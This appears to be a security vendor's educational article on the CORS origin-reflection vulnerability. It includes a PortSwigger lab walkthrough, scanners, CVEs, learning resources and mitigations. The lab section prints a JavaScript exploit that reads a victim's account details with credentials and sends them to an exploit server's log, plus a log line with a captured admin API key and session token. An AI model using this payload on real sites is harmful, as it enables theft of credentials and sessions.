05 Mar, 2024

CORS vulnerability with basic origin reflection

CORS vulnerability with basic origin reflection

Occurs when a web application incorrectly implements the Cross-Origin Resource Sharing (CORS) policy, allowing it to accept requests from any origin. This vulnerability arises when the application reflects the Origin header value from the incoming request back in the Access-Control-Allow-Origin response header without proper validation. As a result, an attacker can craft a malicious web page that, when visited by a victim, makes cross-origin requests to the vulnerable application using the victim’s credentials. Since the application reflects the Origin, it mistakenly trusts the request and sends sensitive data back to the attacker’s domain. This flaw exposes the application to potential data theft, session hijacking, and other security breaches by circumventing the same-origin policy, a critical security mechanism in web browsers designed to isolate resources and data to the domain from which they originated.

Examples of exploitation

For a deeper understanding of the vulnerability, consider a lab exercise from PortSwigger.

To solve the lab, you need to create JavaScript that uses CORS to obtain the administrator API key and upload the code to your exploit server. The problem will be solved when we successfully obtain the admin API key.

Let’s start by examining the account login requests, for this I will use burp. I found one of the requests interesting, so let’s investigate it.

Let’s add an Origin tag to this query and some sort of link to it to confirm the vulnerability.

As we can see the link showed up in the server response. Now let’s use this javascript code to get the API key of the admin page.

    <body data-rsssl=1>
        <h1>Hello World!</h1>
            var xhr = new XMLHttpRequest();
            var url = "https://X.web-security-academy.net"
            xhr.onreadystatechange = function() {
                if (xhr.readyState == XMLHttpRequest.DONE){
                    fetch("/log?key=" + xhr.responseText)

            xhr.open('GET', url + "/accountDetails", true);
            xhr.withCredentials = true;

Let’s send this code using the expolite server. Going to the logs we will see this line: 

 X-X-X X:X:X:X +0000 "GET /log? key={%20%20%22username%22:%20%22administrator%22,%20%20%22email%22:%20%22%22,%20%20%22apikey%22: %20%2268GUX0NAnVliC8aazO5LXijOQTPQQBWG%22,%20%20%22sessions%22:%20[%20%20%20%20%22TtWQVO4D3gfH7Ye50DdMGNpo7EfBkysI%22%20%20]} HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36"

That’s exactly what we need! Let’s use a decoder to make it look more attractive.

Scanners that detect vulnerabilities

  1. OWASP ZAP (Zed Attack Proxy): An open-source web application security scanner, OWASP ZAP is designed to find a variety of security vulnerabilities in web applications during testing phases. It includes a feature to detect misconfigured CORS policies by observing headers and behaviors that suggest improper origin validation.

  2. Burp Suite: A comprehensive platform for web application security testing, Burp Suite offers various tools, including an automated scanner that can identify a range of vulnerabilities, including flawed CORS policies. Its advanced manual tools also allow for custom testing of CORS configurations.

  3. CORS Scanner: A specialized tool that scans for CORS vulnerabilities by sending requests with different origin headers to the target application and analyzing the responses for overly permissive or improperly reflected origins.

  4. Qualys Web Application Scanning (WAS): A cloud-based service that provides automated crawling and testing of custom web applications to identify vulnerabilities. Qualys WAS can detect a wide range of issues, including misconfigurations in CORS policies.

  5. Acunetix: A web vulnerability scanner that automatically tests websites and web applications for vulnerabilities, including CORS misconfigurations. Acunetix checks for specific patterns that indicate a security risk in the handling of cross-origin requests.

  6. Netsparker: A web application security  scanner known for its accuracy and the ability to detect a wide range of vulnerabilities, including CORS issues. Netsparker’s unique proof-based scanning technology can automatically verify the identified vulnerabilities, reducing false positives.

  7. Detectify: An external web application scanner that tests your website for over 2000 vulnerabilities, including misconfigured CORS. It operates from the perspective of an attacker, simulating attacks to provide comprehensive insights into potential security flaws.

  8. Invicti (formerly Netsparker): A web application security solution that offers automated scanning technologies to identify vulnerabilities, including incorrect CORS settings. Invicti uses a dynamic and interactive approach to ensure high accuracy in its vulnerability detection processes.

Average CVSS score for CORS vulnerability with basic origin reflection

The Common Vulnerability Scoring System (CVSS) provides a way to capture the principal characteristics of a security vulnerability and produce a numerical score reflecting its severity. The CVSS score can range from 0 to 10, where 10 represents the highest severity.

CORS vulnerabilities, including those involving basic origin reflection, can vary significantly in their potential impact, depending on the context of the vulnerability, the specific application, and the data it handles. Generally, CORS vulnerabilities that allow arbitrary origins to access resources can lead to information disclosure, and under certain conditions, more severe attacks like credential theft or account takeover.

However, without specific details about the exploitation scenario, the data at risk, and the application’s security posture, it’s challenging to assign a precise average CVSS score to CORS vulnerabilities with basic origin reflection. In practice, these vulnerabilities might receive a moderate to high CVSS score, typically in the range of 4.0 to 7.0, considering factors like:

Confidentiality Impact: If exploiting the vulnerability could result in unauthorized disclosure of information.

Integrity Impact: If exploiting the vulnerability could result in unauthorized modification of data.

Availability Impact: Usually low, unless the vulnerability can be exploited to perform denial of service (DoS) attacks.

The exact score within this range would depend on the specific circumstances of the vulnerability, including how easily it can be exploited and the potential impact of an exploit. It’s essential for organizations to assess each vulnerability in the context of their environment and the data they manage to determine the appropriate severity level and prioritize remediation efforts.

CVES related to CORS vulnerability with basic origin reflection

  1. CVE-2021-27786: This vulnerability relates to how CORS (Cross-Origin Resource Sharing) is implemented, allowing an attacker to potentially carry out privileged actions and access sensitive information when the Access-Control-Allow-Credentials header is enabled. It was given a high severity score by NVD due to its potential impact​​.

  2. CVE-2023-2465: This CVE is associated with an inappropriate implementation in CORS within Google Chrome that allowed a remote attacker to leak cross-origin data via a crafted HTML page​​.

  3. CVE-2022-21817: A CORS vulnerability in NVIDIA Omniverse Launcher that could allow an unprivileged remote attacker, if they can get a user to browse a malicious site, to acquire access tokens allowing them to access resources in other security domains. This vulnerability was considered critical​​.

  4. CVE-2021-26991: This vulnerability was found in Cloud Manager versions prior to 3.9.4, where an insecure CORS policy could allow a remote attacker to interact with Cloud Manager, potentially leading to data modification or addition​​.

  5. CVE-2020-10591: Identified in Walmart Labs Concord before version 1.44.0, this issue involves CORS Access-Control-Allow-Origin headers having a potentially unsafe dependency on Origin headers, which are not configurable. This could allow remote attackers to discover host information, nodes, API metadata, and references to usernames​​.

To study CORS vulnerability with basic origin reflection


Web Security: Common Vulnerabilities And Their Mitigation on platforms like Coursera or Udemy. These courses often cover a broad range of web vulnerabilities, including CORS issues, and provide insights into how to identify and mitigate them.

PortSwigger Web Security Academy: Offers interactive labs and learning materials specifically focused on CORS vulnerabilities, among other web security issues. It’s a great resource for both beginners and experienced professionals to understand and practice exploitation and mitigation techniques.

Pluralsight: Offers several courses on web security that can help understand the principles behind CORS, its vulnerabilities, including origin reflection, and the best practices for securing web applications.


“The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws” by Dafydd Stuttard and Marcus Pinto: Provides a comprehensive look into web application security, including chapters that can help understand CORS vulnerabilities and their implications.

“Web Security for Developers: Real Threats, Practical Defense” by Malcolm McDonald: A more recent entry that covers modern web security concerns, including CORS and how to properly implement web security measures.

“Cross-Origin Resource Sharing (CORS): A deep dive into CORS for security professionals and developers” (if available): Books specifically dedicated to CORS are rare, but there might be specialized resources or chapters in broader web security books that deal with this topic in depth.

Labs and Practice Platforms

OWASP Juice Shop: An intentionally insecure web application designed for security training. It includes challenges related to CORS and other vulnerabilities, allowing for practical hands-on learning.

Hack The Box and TryHackMe: Both platforms offer labs and challenges that can include CORS vulnerabilities. They cater to all levels of expertise and provide a gamified learning experience.

PentesterLab: Offers exercises and badges specifically focused on web vulnerabilities, including CORS. It’s a great way to gain practical experience in exploiting and mitigating such issues.

Online Platforms and Communities

OWASP Foundation: The Open Web Application Security Project (OWASP) is a nonprofit foundation that works to improve the security of software. Their website and community forums are rich resources for learning about CORS vulnerabilities and security best practices.

GitHub and Stack Overflow: These platforms are valuable for learning through real-world examples and community discussions. You can find projects with CORS implementations, discussions on CORS vulnerabilities, and questions related to specific CORS issues.

How to protect yourself from CORS vulnerability with basic origin reflection?

Validate Origin Header Properly

Implement strict validation of the Origin header for all incoming requests. Only allow requests from trusted origins and reject or ignore requests from unknown or untrusted sources. This can be done by maintaining a whitelist of allowed origins and checking the Origin header against this list.

Use a CORS Library or Middleware

Leverage well-maintained CORS libraries or middleware for your web application framework (such as Express.js CORS middleware for Node.js applications). These libraries often provide a more secure and configurable way to handle CORS policies compared to custom implementations.

Avoid Reflecting the Origin Header

Do not simply echo back the Origin header value in the Access-Control-Allow-Origin (ACAO) response header. This practice can lead to vulnerabilities by trusting any origin. If dynamic origins are necessary, ensure they are validated against a controlled list before being echoed back.

Use CORS Configuration Options Wisely

Set Access-Control-Allow-Credentials to true only when necessary: This header should be used cautiously because it allows cookies and other credentials to be included in cross-origin requests. If your application doesn’t need to handle authenticated requests from other origins, keep this disabled.

Limit HTTP Methods and Headers: Use Access-Control-Allow-Methods and Access-Control-Allow-Headers to restrict the methods and headers that can be used in cross-origin requests, minimizing the attack surface.

Implement Additional Security Headers

Beyond CORS-specific headers, employ other security headers to enhance your application’s defense:

Content-Security-Policy (CSP): Helps prevent a range of attacks, including Cross-Site Scripting (XSS), which can exacerbate CORS vulnerabilities.

X-Content-Type-Options: Set to nosniff to prevent the browser from trying to MIME-sniff the content type of a response away from the declared content-type.

Strict-Transport-Security (HSTS): Enforce secure (HTTPS) connections to the server.

Regularly Review and Update CORS Policies

Security is an ongoing process. Regularly review your CORS policies and the list of allowed origins. As your application evolves, so too might your CORS requirements. Keep up with security best practices and updates to CORS specifications.

Security Testing and Audits

Conduct regular SECURITY ASSESSMENTS, including penetration testing and code reviews, focused on CORS implementation. Automated security scanners can identify some misconfigurations, but expert review is crucial for complex scenarios.

Educate Development Team

Ensure that your development team understands the risks associated with CORS and the importance of secure implementation. Regular training and updates on web security best practices can help prevent vulnerabilities.


In conclusion, the CORS vulnerability with basic origin reflection represents a significant security risk in modern web applications, where the lines between different services and origins are increasingly blurred. This vulnerability underscores the complexity of web-based architectures and the inherent risks when cross-origin policies are not rigorously enforced. The real-world implications of such vulnerabilities can range from unauthorized access to sensitive data to account takeovers, highlighting the need for developers to be well-versed in both the theory and practice of CORS policies.

As we integrate more diverse services into web applications, the importance of understanding and implementing secure cross-origin interactions becomes paramount. This article has illustrated not just how such vulnerabilities can be exploited, but also the tools and strategies necessary to prevent them. It reminds us that security is not merely a feature, but a fundamental component of the development lifecycle that demands diligence, ongoing education, and a proactive mindset.

To mitigate these vulnerabilities, developers and security professionals must prioritize secure coding practices, conduct regular security testing, and remain vigilant against the ever-evolving landscape of web-based threats. By doing so, they will not only protect their applications and users but also contribute to the broader effort of creating a safer internet for everyone.

Other Services

Ready to secure?

Let's get in touch